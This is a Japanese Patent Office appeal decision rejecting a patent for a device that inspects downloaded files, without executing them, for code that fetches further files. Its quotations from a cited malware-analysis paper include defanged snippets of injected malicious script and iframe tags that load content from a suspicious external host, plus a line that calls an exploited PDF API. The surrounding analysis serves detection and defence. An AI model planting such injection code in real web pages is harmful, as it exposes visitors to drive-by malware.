• ポートフォリオ機能


ポートフォリオを新規に作成して保存
既存のポートフォリオに追加保存

  • この表をプリントする
PDF PDFをダウンロード
審決分類 審判 査定不服 5項独立特許用件 特許、登録しない。 G06F
審判 査定不服 2項進歩性 特許、登録しない。 G06F
管理番号 1310059
審判番号 不服2015-3905  
総通号数 195 
発行国 日本国特許庁(JP) 
公報種別 特許審決公報 
発行日 2016-03-25 
種別 拒絶査定不服の審決 
審判請求日 2015-02-27 
確定日 2016-01-14 
事件の表示 特願2011- 8926「情報処理装置、システム、通信監視方法およびプログラム」拒絶査定不服審判事件〔平成24年 8月 9日出願公開、特開2012-150658〕について、次のとおり審決する。 
結論 本件審判の請求は、成り立たない。 
理由 第1 手続の経緯

本件審判請求に係る出願(以下,「本願」という。)は,平成23年1月19日の出願であって,その手続の経緯は以下のとおりである。

平成25年11月25日 :出願審査請求書の提出
平成26年 7月22日付け :拒絶理由の通知
平成26年 9月18日 :意見書,手続補正書の提出
平成26年11月25日付け :拒絶査定
平成27年 2月27日 :審判請求書,手続補正書の提出
平成27年 3月11日 :上申書の提出
平成27年 4月14日 :前置報告
平成27年 8月20日 :上申書の提出

第2 平成27年2月27日付けの手続補正についての補正却下の決定

[補正却下の決定の結論]

平成27年2月27日付けの手続補正を却下する。

[理由]

1.補正の内容

平成27年2月27日付けの手続補正(以下,「本件補正」という。)の内容は,平成26年9月18日付けの手続補正により補正された特許請求の範囲の記載

「 【請求項1】
データファイルを取得するファイル取得手段と,
取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査する第1のファイル検査手段と,
前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査する第2のファイル検査手段と,
を備え,
前記第1のファイル検査手段は,前記第1のデータファイルを実行することなく当該第1のデータファイルに前記プログラムコードが含まれているか否かを検査し,
前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく当該第2のデータファイルを検査する,情報処理装置。
【請求項2】
前記ファイル取得手段は,ネットワーク・トラフィックからデータを取得するためのリクエストを検出し,当該ネットワーク・トラフィックから当該リクエストに応じて取得されたデータファイルを抽出することにより前記第1のデータファイルを取得することを特徴とする,
請求項1に記載の情報処理装置。
【請求項3】
前記第1のファイル検査手段により前記第1のデータファイルから前記プログラムコードが検出された場合,当該第1のデータファイルおよび当該プログラムコードに基づいて取得される前記第2のデータファイルの送信元の情報を取得する送信元情報取得手段をさらに備えることを特徴とする,
請求項1または請求項2に記載の情報処理装置。
【請求項4】
前記第2のファイル検査手段は,前記第2のデータファイルに予め定められた特定の動作を行うためのプログラムコードが含まれているか否かを検査する,
請求項1乃至請求項3のいずれかに記載の情報処理装置。
【請求項5】
前記第2のファイル検査手段は,少なくとも,前記第2のデータファイルの作成日時の情報,著作権情報,バージョン情報,ファイル名のいずれかを含む,当該第2のデータファイルのメタ情報が予め定められた条件を満たすか否かを検査する,
請求項1乃至請求項4に記載の情報処理装置。
【請求項6】
ネットワークに接続されたクライアント端末と,
前記クライアント端末によるネットワーク通信を監視する通信監視装置と,を備え,
前記通信監視装置は,
前記クライアント端末から出力されたデータを取得するためのリクエストをネットワーク・トラフィックから検出し,当該リクエストに応じて取得されたデータファイルを当該ネットワーク・トラフィックから取得するファイル取得手段と,
取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査する第1のファイル検査手段と,
前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査する第2のファイル検査手段と,
を備え,
前記第1のファイル検査手段は,前記第1のデータファイルを実行することなく当該第1のデータファイルに前記プログラムコードが含まれているか否かを検査し,
前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく当該第2のデータファイルを検査する,システム。
【請求項7】
ネットワーク通信の監視方法であって,
ネットワークに接続されたコンピュータが,ネットワーク・トラフィックからデータを取得するためのリクエストを検出し,当該ネットワーク・トラフィックから当該リクエストに応じて取得されたデータファイルを抽出することにより第1のデータファイルを取得するステップと,
前記コンピュータが,取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査するステップと,
前記コンピュータが,前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査するステップと,
を含み,
前記プログラムコードが含まれているか否かを検査するステップでは,前記第1のデータファイルを実行することなく当該第1のデータファイルに当該プログラムコードが含まれているか否かを検査し,
前記第2のデータファイルを検査するステップでは,前記第2のデータファイルを実行することなく当該第2のデータファイルを検査する,通信監視方法。
【請求項8】
ネットワークに接続されたコンピュータを制御するプログラムにおいて,
ネットワーク・トラフィックからデータを取得するためのリクエストを検出し,当該ネットワーク・トラフィックから当該リクエストに応じて取得されたデータファイルを抽出することにより第1のデータファイルを取得するファイル取得手段と,
取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査する第1のファイル検査手段と,
前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査する第2のファイル検査手段として,
前記コンピュータを機能させ,
前記第1のファイル検査手段は,前記第1のデータファイルを実行することなく当該第1のデータファイルに前記プログラムコードが含まれているか否かを検査し,
前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく当該第2のデータファイルを検査する,プログラム。」(以下,この特許請求の範囲に記載された請求項を「補正前の請求項」という。)を,

「 【請求項1】
データファイルを取得するファイル取得手段と,
取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査する第1のファイル検査手段と,
前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査する第2のファイル検査手段と,
を備え,
前記第1のファイル検査手段は,前記第1のデータファイルを実行することなく当該第1のデータファイルに前記プログラムコードが含まれているか否かを検査し,
前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査する,情報処理装置。
【請求項2】
前記ファイル取得手段は,ネットワーク・トラフィックからデータを取得するためのリクエストを検出し,当該ネットワーク・トラフィックから当該リクエストに応じて取得されたデータファイルを抽出することにより前記第1のデータファイルを取得することを特徴とする,
請求項1に記載の情報処理装置。
【請求項3】
前記第1のファイル検査手段により前記第1のデータファイルから前記プログラムコードが検出された場合,当該第1のデータファイルおよび当該プログラムコードに基づいて取得される前記第2のデータファイルの送信元の情報を取得する送信元情報取得手段をさらに備えることを特徴とする,
請求項1または請求項2に記載の情報処理装置。
【請求項4】
前記第2のファイル検査手段は,前記第2のデータファイルに予め定められた特定の動作を行うためのプログラムコードが含まれているか否かを検査する,
請求項1乃至請求項3のいずれかに記載の情報処理装置。
【請求項5】
前記第2のファイル検査手段は,少なくとも,前記第2のデータファイルの作成日時の情報,著作権情報,バージョン情報,ファイル名のいずれかを含む,当該第2のデータファイルのメタ情報が予め定められた条件を満たすか否かを検査する,
請求項1乃至請求項4に記載の情報処理装置。
【請求項6】
ネットワークに接続されたクライアント端末と,
前記クライアント端末によるネットワーク通信を監視する通信監視装置と,を備え,
前記通信監視装置は,
前記クライアント端末から出力されたデータを取得するためのリクエストをネットワーク・トラフィックから検出し,当該リクエストに応じて取得されたデータファイルを当該ネットワーク・トラフィックから取得するファイル取得手段と,
取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査する第1のファイル検査手段と,
前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査する第2のファイル検査手段と,
を備え,
前記第1のファイル検査手段は,前記第1のデータファイルを実行することなく当該第1のデータファイルに前記プログラムコードが含まれているか否かを検査し,
前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査する,システム。
【請求項7】
ネットワーク通信の監視方法であって,
ネットワークに接続されたコンピュータが,ネットワーク・トラフィックからデータを取得するためのリクエストを検出し,当該ネットワーク・トラフィックから当該リクエストに応じて取得されたデータファイルを抽出することにより第1のデータファイルを取得するステップと,
前記コンピュータが,取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査するステップと,
前記コンピュータが,前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査するステップと,
を含み,
前記プログラムコードが含まれているか否かを検査するステップでは,前記第1のデータファイルを実行することなく当該第1のデータファイルに当該プログラムコードが含まれているか否かを検査し,
前記第2のデータファイルを検査するステップでは,前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査する,通信監視方法。
【請求項8】
ネットワークに接続されたコンピュータを制御するプログラムにおいて,
ネットワーク・トラフィックからデータを取得するためのリクエストを検出し,当該ネットワーク・トラフィックから当該リクエストに応じて取得されたデータファイルを抽出することにより第1のデータファイルを取得するファイル取得手段と,
取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査する第1のファイル検査手段と,
前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査する第2のファイル検査手段として,
前記コンピュータを機能させ,
前記第1のファイル検査手段は,前記第1のデータファイルを実行することなく当該第1のデータファイルに前記プログラムコードが含まれているか否かを検査し,
前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査する,プログラム。」(当審注:下線は,出願人が付与したものである。以下,この特許請求の範囲に記載された請求項を「補正後の請求項」という。)に補正するものである。

そして,本件補正は,願書に最初に添付した明細書,特許請求の範囲又は図面に記載した事項の範囲内においてなされており,特許法第17条の2第3項の規定に適合している。

2.目的要件

本件補正が,特許法第17条の2第5項の規定を満たすものであるか否か,すなわち,本件補正が,特許法第17条の2第5項に規定する請求項の削除,特許請求の範囲の減縮(特許法第36条第5項の規定により請求項に記載した発明を特定するために必要な事項を限定するものであって,その補正前の当該請求項に記載された発明とその補正後の当該請求項に記載される発明の産業上の利用分野及び解決しようとする課題が同一であるものに限る),誤記の訂正,或いは,明りょうでない記載の釈明(拒絶理由通知に係る拒絶の理由に示す事項についてするものに限る)の何れかを目的としたものであるかについて,以下に検討する。

(1)補正前の請求項と,補正後の請求項とを比較すると,補正後の請求項1?8はそれぞれ,補正前の請求項1?8に対応することは明らかである。

(2)本件補正は,下記の補正事項1?4よりなるものである。

<補正事項1>
補正前の請求項1の
「前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく当該第2のデータファイルを検査する」との記載を,
補正後の請求項1の
「前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査する」との記載に限定する補正。

<補正事項2>
補正前の請求項6の
「前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく当該第2のデータファイルを検査する」との記載を,
補正後の請求項6の
「前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査する」との記載に限定する補正。

<補正事項3>
補正前の請求項7の
「前記第2のデータファイルを検査するステップでは,前記第2のデータファイルを実行することなく当該第2のデータファイルを検査する」との記載を,
補正後の請求項7の
「前記第2のデータファイルを検査するステップでは,前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査する」との記載に限定する補正。

<補正事項4>
補正前の請求項8の
「前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく当該第2のデータファイルを検査する」との記載を,
補正後の請求項8の
「前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査する」との記載に限定する補正。

(3)補正事項1?4について

上記補正事項1は,「記第2のファイル検査手段」について,検査処理を「静的な情報」に基づくように限定して下位概念化する補正である。
そして,これによって当該発明の産業上の利用分野及び解決しようとする課題が格別変更されるものではない。
したがって,当該補正事項の目的は,請求項に記載した発明特定事項を限定するものであって,その補正前後の当該請求項に記載された発明の産業上の利用分野及び解決しようとする課題が同一であるもの(以下,単に「限定的減縮」という。)に該当する。
補正事項2?4についても同様である。

(4)したがって,上記補正事項1?4は限定的減縮を目的とするものであり,本件補正は,特許法第17条の2第5項第2号に掲げる特許請求の範囲の減縮を目的とするものに該当すると言えることから,特許法第17条の2第5項の規定を満たすものである。

3.独立特許要件

以上のように,本件補正は,限定的減縮を目的とする上記補正事項1?4を含むものである。そこで,限定的減縮を目的として補正された補正後の請求項1に記載された発明(以下,「本件補正発明」という。)が特許出願の際独立して特許を受けることができるものであるか(特許法第17条の2第6項において準用する同法第126条第7項の規定に適合するか)以下に検討する。

(1)本件補正発明

本件補正発明は,上記平成27年2月27日付け手続補正により補正された特許請求の範囲,明細書及び図面の記載からみて,その特許請求の範囲の請求項1に記載された以下のとおりのものと認める。

「データファイルを取得するファイル取得手段と,
取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査する第1のファイル検査手段と,
前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査する第2のファイル検査手段と,
を備え,
前記第1のファイル検査手段は,前記第1のデータファイルを実行することなく当該第1のデータファイルに前記プログラムコードが含まれているか否かを検査し,
前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査する,情報処理装置。」

(2)引用文献

本願出願前に頒布され,原審の拒絶査定の理由である上記平成26年7月22日付けの拒絶理由通知(以下,「原審拒絶理由」という。)において引用された,神薗雅紀,“動的解析を利用した難読化JavaScriptコード解析システムの実装と評価”,コンピュータセキュリティシンポジウム2010論文集[第二分冊],一般社団法人情報処理学会,453?458頁(平成22年10月12日発行,以下,「引用文献」という。)には,関連する図面とともに,以下の技術的事項が記載されている。(当審注:下線は,参考のために当審で付与したものである。)

A.「1.はじめに
近年,Webを介したマルウェアの配布が横行しているが,中でも多段のWebサイトを経由させマルウェアをダウンロードさせる手法が多く見られている。多段にWebサイトを経由させる方法としては,HTTP Status code(3xx系code)や〈meta http-equiv=“refresh”〉タグを利用したもの,JavaScriptのlocationやdocument.writeを利用し他のサイトへ誘導する手法が代表的である。特にJavaScriptを利用する手法では,スクリプトを難読化し追跡を困難とするものが猛威を振るっている。これらのインシデントが発生した際に原因を解明するためには,通信データを解析する必要がある。まず,前者の手法が利用された場合は,HTTP Header部のLocationに記載されたURLを追っていくことで基本的には不正サイトのリダイレクト処理を追うことが可能である。これに対し後者の手法が利用された場合,正確にURLを辿るためにはスクリプトを解読し,リダイレクトや誘導するURL,他のスクリプトやファイルダウンロードに指定されたURL等を導き出す必要がある。
また,最終的にダウンロードされる不正なファイルの多くも,アプリケーションの脆弱性を突く難読化されたJavaScriptが埋め込まれているものが多く見られる。特に,Adobe Readerに複数のゼロデイが存在したこともあり,pdf(PortableDocument Format,以下pdfと称する)形式のマルウェアが顕著に現れている。この難読化された不正なpdfファイルを解析するためには,pdfファイルから圧縮されたJavaScriptコードを抽出し,難読化を解除する必要がある。これらのインシデントを詳細に把握するためには,一般的に図1に示す手順もしくは逆に被害から解析を進めていく必要があり,大変困難な作業となる。・・・(後略)・・・」(453頁左欄?454頁左欄)

B.
「(1)通信データから疑わしいサイトに着目する

(2)着目サイトのHTMLから疑わしいスクリプトを抽出する

(3)難読化スクリプトを解析する
他のサイトに誘導するURLや,ダウンロードされた
pdfファイルを把握する

(4)誘導されるサイトのURLを通信データから特定し,(2)へ
pdfファイルがダウンロードされている場合は(5)へ

(5)pdfファイルからJavaScriptや
JavaScriptが利用する情報を抽出する

(6)抽出したJavaScriptを解析する

(7)解析情報より,インシデントへの対処を行う。

終了

図1 一般的なインシデント解析手順と開発システムの対応範囲」
(454頁左欄 図1)

C.「4.2.不正pdfファイル内のJavaScript抽出ならびに 動的解析例
D3M 2010(IP:***.63.44.247)が配布する不正なpdfファイル(readme.pdf;)を2章ならびに3章の開発システムを用い解析する。
まず,解析対象ファイルはpdf形式であるのでpdf内から自動的にJavaScriptを抽出する。抽出したJavaScriptを図9に示す。内容からも判断できるとおり,難読化が施されている。次に,抽出したJavaScriptを動的解析する。解析結果を図10に示す。本スクリプトはAdobeAPIを利用しないため,ページ情報等は不要であった。
解析結果より,実際のペイロードや脆弱性が利用されるCollab.getIcon APIまで求めることができている。これより,解析対象としたpdfファイルはCVE-2009-0927を利用した不正なマルウェアであると判断できる。」(456頁右欄)

D.「function getIcon(){
・・・(中略)・・・
Collab.getIcon(buffer+N.bundle); CVE-2009-0927


図10開発システム解析結果より抽出したコード」
(457頁左欄 図10)

E.「4.3.不正サイトから誘導されマルウェアがダウンロードされるまでの一連の追跡例
D3M 2010通信データから不正サイトにアクセスし,多段の誘導によりマルウェアがダウンロードされるまでの一連の処理を,開発システムを用いて解析する。
図11に処理の流れと解析結果を示す。まず,疑わしいサイトへのアクセスに着目し,当該HTML内の不正と思われるコードを特定する。ここでは,IP:***.6.158.3 index.htmlファイル内に難読化されたJavaScriptが埋め込まれているため,当該コードを解析対象とし,JavaScript動的解析を行う。動的解析結果より,不正コードは「<Script defer src=”hxxp://******jeuxvideo.com.met-art-com.supernewstuff.ru:8080/google.com/google.com/bloomberg.com/amazon.com/rivals.com.php”></script>;」となり,<SCRIPT>タグにより外部スクリプトファイルを実行していることがわかる。また,導きだされたスクリプトの書式より,8080 Injectionの典型的なスクリプトであることがわかる。
次に,動的解析結果より導き出されたURL(IP:***.75.218.192/google.com/google.com/bloomberg.com/amazon.com/rivals.com.php)を確認すると,難読化されたスクリプトファイルであることがわかる。同様に動的解析を行うと,不正コードは「<iframe src=”http://******.jeuxvideo.com.met-art-com.supernewstuff.る:8080/index.php?jl=”〉</iframe>」となった。動関解析結果より,不正コードは<iframe>タグを用い,さらに別のHTMLを読み込んでいることがわかる。
さらに,動的解析から導きだされたURL(IP:・**.75.218.192/index.php?jlbloomberg.com/amazon.com/rivals.com.php)を確認すると,<div>タグに記載されたテキストが難読化されたデータ本体であり,innerHTMLのメソッドを使ってスクリプトから参照されていることがわかる。
開発のシステムでは,前述した疑似的DOM環境によりinnerHTMLを介したDOM要素へのアクセスも実現しているため,このようなスクリプトの動的解析も可能である。ただし,当該スクリプトファイルはコード中間部の<SCRIPT>内の難読化コードが同サイトのスクリプトファイル(/pics/jquery.jxx)を実行し,その情報を利用して難読化を解除する。開発システムでは,他のスクリプトファイルを自動的に呼び込むことはできないため,本処理のみ手動で行い,動的解析システムを実行すると,「<iframe src=”/pits/ChangeLog.pdf’〉</iframe><ifrante src=”/pics/java.html”〉</iframe>」が生成され,ようやく疑わしいファイルがダウンロードされることがわかる。
・・・(中略)・・・
続いて,ダウンロードされたpdfファイルを解析する。図12に解析概要を示す。まず,提案システムを用いpdfファイルから自動的にJavaScriptならびにページ情報を抽出する。抽出したJavaScriptを確認するとJavaScript for Acrobat API[7](以下,Acrobat APIと称する)を利用するため,このままでは開発システムによる動的解析が行えない。Acrobat API処理のみ手動でエミュレートする。今回使用されているAcrobat APIはpdfの指定ページ内の単語数を取得するgetPageNumWords,特定ページ内の指定番目の単語を取得するgetPageNthWordである。文字列を操作するadobe.substrより,本スクリプトではpdfの2ページ目の全ての単語の後ろ2byteに難読化された情報が埋め込まれている。この処理をエミュレートし,提案システムにて解析すると全て難読化を解除したコードを導き出すことができた。解析結果より,app.viewerVersion.toStringにより現在のビューアのバージョンに合わせ,複数の脆弱性(CVE-2008-2992,CVE-2008-0655,CVE-2009-0927)を突くマルウェアであることが判明した。」(457頁左欄?458頁左欄)

ここで,上記引用文献に記載されている事項を検討する。

ア.上記Aの「この難読化された不正なpdfファイルを解析するためには,pdfファイルから圧縮されたJavaScriptコードを抽出し,難読化を解除する必要がある。これらのインシデントを詳細に把握するためには,一般的に図1に示す手順もしくは逆に被害から解析を進めていく必要があり,大変困難な作業となる。」との記載,
上記Bの
「(1)通信データから疑わしいサイトに着目する

(2)着目サイトのHTMLから疑わしいスクリプトを抽出する

(3)難読化スクリプトを解析する
他のサイトに誘導するURLや,ダウンロードされた
pdfファイルを把握する
・・・(中略)・・・
図1 一般的なインシデント解析手順と開発システムの対応範囲」との記載,
上記Eの「4.3.不正サイトから誘導されマルウェアがダウンロードされるまでの一連の追跡例
D3M 2010通信データから不正サイトにアクセスし,多段の誘導によりマルウェアがダウンロードされるまでの一連の処理を,開発システムを用いて解析する。
図11に処理の流れと解析結果を示す。まず,疑わしいサイトへのアクセスに着目し,当該HTML内の不正と思われるコードを特定する。ここでは,IP:***.6.158.3 index.htmlファイル内に難読化されたJavaScriptが埋め込まれているため,当該コードを解析対象とし,JavaScript動的解析を行う。動的解析結果より,不正コードは・・・(中略)・・・外部スクリプトファイルを実行していることがわかる。」,「次に,動的解析結果より導き出されたURL・・・(中略)・・・を確認すると,難読化されたスクリプトファイルであることがわかる。同様に動的解析を行うと,・・・(中略)・・・動関解析結果より,不正コードは<iframe>タグを用い,さらに別のHTMLを読み込んでいることがわかる。」との記載からすると,

引用文献に記載の「システム」は,既存の「一般的なインシデント解析手順」の一部を改良したものであり,
通信データから不正サイトにアクセスしてHTMLファイルを読み取り,当該HTMLファイル内のスクリプトを動的解析して該スクリプトが外部スクリプトファイルを読み込んでいることを判別していることが読みとれるから,

引用文献には,
“HTMLファイルを読み込み,
前記HTMLファイルに対して,スクリプトの抽出・動的解析を行い,前記スクリプトが外部スクリプトファイルを読み込んでいるか否かを判断”することが記載されていると認められる。

イ.上記Bの
「(2)着目サイトのHTMLから疑わしいスクリプトを抽出する

(3)難読化スクリプトを解析する
他のサイトに誘導するURLや,ダウンロードされた
pdfファイルを把握する

(4)誘導されるサイトのURLを通信データから特定し,(2)へ
pdfファイルがダウンロードされている場合は(5)へ

(5)pdfファイルからJavaScriptや
JavaScriptが利用する情報を抽出する

(6)抽出したJavaScriptを解析する」との記載,
上記Cの「解析対象ファイルはpdf形式であるのでpdf内から自動的にJavaScriptを抽出する。」,「次に,抽出したJavaScriptを動的解析する。解析結果を図10に示す。」,「解析結果より,実際のペイロードや脆弱性が利用されるCollab.getIcon APIまで求めることができている。これより,解析対象としたpdfファイルはCVE-2009-0927を利用した不正なマルウェアであると判断できる。」との記載,
上記Dの「function getIcon(){
・・・(中略)・・・
Collab.getIcon(buffer+N.bundle); CVE-2009-0927


図10開発システム解析結果より抽出したコード」との記載,
上記Eの「続いて,ダウンロードされたpdfファイルを解析する。図12に解析概要を示す。まず,提案システムを用いpdfファイルから自動的にJavaScriptならびにページ情報を抽出する。」,「文字列を操作するadobe.substrより,本スクリプトではpdfの2ページ目の全ての単語の後ろ2byteに難読化された情報が埋め込まれている。この処理をエミュレートし,提案システムにて解析すると全て難読化を解除したコードを導き出すことができた。解析結果より・・・(中略)・・・複数の脆弱性・・・(中略)・・・CVE-2009-0927)を突くマルウェアであることが判明した。」との記載からすると,

ダウンロードされたpdfファイルの「動的解析」の解析結果である図10は,「難読化を解除したコード」であり,該コードが,既知の脆弱性のあるAPIを呼び出すコードを含むか否かを判断することで,「解析対象としたpdfファイル」が不正なマルウェアであると判断できることが読みとれるから,

引用文献には,
“HTMLファイル内のスクリプトによりpdfファイルがダウンロードされる場合,前記pdfファイルに対して,スクリプトの抽出・動的解析により難読化を解除し,難読化を解除したコード内の,既知の脆弱性のあるコードの有無で,マルウェアであるか否かを判断”することが記載されていると認められる。

ウ.以上,ア.?イ.で指摘した事項から,引用文献には,次の発明(以下,「引用発明」という。)が記載されているものと認める。

「HTMLファイルを読み込み,
前記HTMLファイルに対して,スクリプトの抽出・動的解析を行い,前記スクリプトが外部スクリプトファイルを読み込んでいるか否かを判断し,
HTMLファイル内のスクリプトによりpdfファイルがダウンロードされる場合,前記pdfファイルに対して,スクリプトの抽出・動的解析により難読化を解除し,難読化を解除したコード内の,既知の脆弱性のあるコードの有無で,マルウェアであるか否かを判断するシステム。」

(3)参考文献

ア.参考文献1に記載されている技術的事項
本願出願前に頒布され,原審拒絶理由において引用された,特開2010-146566号公報(平成22年7月1日出願公開,以下,「参考文献1」という。)には,関連する図面とともに,以下の技術的事項が記載されている。(当審注:下線は,参考のために当審で付与したものである。)

F.「【0037】
・・・(中略)・・・
例えば,セキュリティモジュールは未知の実行可能ファイルを受け取る可能性がある(ステップ440)。セキュリティモジュールは,未知の実行可能ファイルが前もって識別されたマルウェアを示すメタデータフィールド属性を含んでいるか否かを決定することによって,未知の実行可能ファイルがマルウェアを含んでいるか否かを決定することができる。」

G.「【0061】
ある実施形態では,コンピューティングシステムは悪意実行可能ファイルを受け取る可能性がある。コンピューティングシステムは,未知の実行可能ファイルがマルウェアを示すメタデータフィールド属性を含んでいるか否かを決定することにより,未知の実行可能ファイルがマルウェアを含んでいるか否かを決定することができる。・・・(後略)・・・」

H.「【0067】
ある実施形態では,システムは未知の実行可能ファイルを受け取る,および/またはその未知の実行可能ファイルがマルウェアを示すヘッダフィールド属性を含んでいるか否かを決定することによって,その未知の実行可能ファイルがマルウェアを含んでいるか否かを決定するようにプログラムしたセキュリティシステムを有することができる。・・・(後略)・・・」

イ.参考文献2に記載されている技術的事項
本願出願前に頒布され,原審の拒絶査定において引用された,特開2010-262609号公報(平成22年11月18日出願公開,以下,「参考文献2」という。)には,関連する図面とともに,以下の技術的事項が記載されている。(当審注:下線は,参考のために当審で付与したものである。)

J.「【0002】
マルウェア(malicious software)は,悪意あるコードを含むソフトウェアおよびファイルを指す。コンピュータウイルス,トロイの木馬,ボット,ワーム,スパイウェア等,遠隔地のコンピュータに侵入し攻撃を行うプログラム,他のコンピュータへの感染活動や破壊活動を行うプログラム,および,情報を外部に漏洩する有害な動作を含める。
【0003】
マルウェアの静的解析は,解析対象となるプログラムの実行前に検査を行い,マルウェアかどうか判定する手法を指す。Windows(登録商標;以下,略記する)プログラムでは,プログラム実行前であってもプログラムファイルを検査することで取得できる情報がある。プログラム自身のファイルサイズ,プログラムに電子署名があるかどうか,実行プログラムファイルのハッシュ値等が実行前に取得できる情報に含まれる。各プログラムはこれら実行前に分かる情報をデータベースとして持っており,静的解析ではこのデータベースを検査することでマルウェアか否かを判定する。
【0004】
マルウェアの動的解析は,解析対象となるプログラムを実行後,その挙動を検査してマルウェアか否か判定する手法を指す。マルウェアらしき振る舞いとして判定する挙動には,メールを大量に送り始める,ファイアウォールやOS(Operating System)のセキュリティ機能を停止する,システムファイルを削除する,他のプロセスに侵入しコードを実行する等が含まれる。これらの挙動を行っているかを解析することで,プログラムがマルウェアか否かを判定する。
【0005】
従来のマルウェア検出手法では,静的解析(段落0003)と動的解析(段落0004)が別々のモジュールとして実装されており,それぞれのモジュールが独立して動作していた。もしくは,静的解析と動的解析の両モジュール間に情報の受け渡しがあったとしても,例えば一部の信用できるプログラムについては動的解析を一切実行しないといった限定的な手法が採用されていた。なお,本項(段落0005)での「信用できるプログラム」とは,静的解析単独の判断によって非マルウェアと分類されたファイルを指す。」

ウ.参考文献3に記載されている技術的事項
本願出願前に頒布された特表2008-523471号公報(平成20年7月3日公表,以下,「参考文献3」という。)には,関連する図面とともに,以下の技術的事項が記載されている。(当審注:下線は,参考のために当審で付与したものである。)

K.「【要約】
本発明は,潜在的なマルウェア装置を安全なプログラムコードへ翻訳するためのシステムと方法を含む。潜在的なマルウェアは,限定的ではなく,ネイティブCPUプログラムコード,プラットホーム独立.NETバイトコード,スクリプティングバイトコード等を含むソース言語の異なるいくつかのタイプのいずれか1つから翻訳される。翻訳されたプログラムコードはネイティブCPUにより理解され且つ実行されるプログラムコードにコンパイルされる。実行中及び/又は前に,本発明はスキャナーによりメモリ内に記憶された潜在的なマルウェアを探索させる。もし,マルウェアが検出されないと,計算装置はCPUにより翻訳されたプログラムコードを実行させる。しかし,もし,潜在的なマルウェアを記憶したコンピュータメモリが実行中に変更された場合,潜在的なマルウェアの実行及び/又は解析が中断できる。この場合,メモリ内に記憶された潜在的なマルウェアは実行前に安全なプログラムコードに翻訳される。」

L.「【0005】
アンチビールスソフトウェアが何千の既知のコンピュータマルウェアを認識することについてより効率的に且つ洗練されるにつれて,コンピュータマルウェアも同じくより洗練されてきている。例えば,悪意のあるコンピュータユーザは今やマルウェアを暗号化してマルウェアシグネチャを認識できないパターンの背後に隠す。例えば,ポリモルフイック(polymorphic)マルウェアはマルウェア復号化ルーチン及び暗号化されたマルウェア「ペイロード」からなる。ユーザが感染したプログラムを実行した時,マルウェア復号化ルーチンは計算装置の制御を獲得して,そして前もって暗号化されたマルウェアペイロードを復号する。そして,マルウェア復号化ルーチンは計算装置の制御を復号化されたマルウェアペイロードに移転する。新しい目標が感染する度に,マルウェアは復号化ルーチン及びマルウェアペイロードの両方を複製する。典型的に,マルウェアペイロードを暗号化するために使用される暗号キーはマルウェアが複製される時に変更される。この結果,暗号化されたマルウェアは,そのマルウェアがアンチビールスソフトウェアにより認識されることのできる識別可能なパターン又は「シグネチャ」を持たない。
【0006】
オリゴモルフィック(oligomorphic)マルウェアが生成された時,アンチビールスソフトウェア開発者は,復号化ルーチンはマルウェアのバージョン間で一定に留まることを認識しいていた。アンチビールスソフトウェア開発者は,この弱点を利用して,マルウェアシグネチャについてのみスキャンするだけではなく,マルウェアに付随していると知られる特定の復号化ルーチンに対してもスキャンする。これに応答して,悪意のあるコンピュータユーザは,復号化ルーチンが識別されるのを防ぐために設計されたより洗練されたマルウェアを開発した(以降,マルウェアシグネチャを隠すために設計された技術を使用するマルウェアの全てのタイプを「隠されたマルウェア」と呼ぶ)。」

M.「【0009】
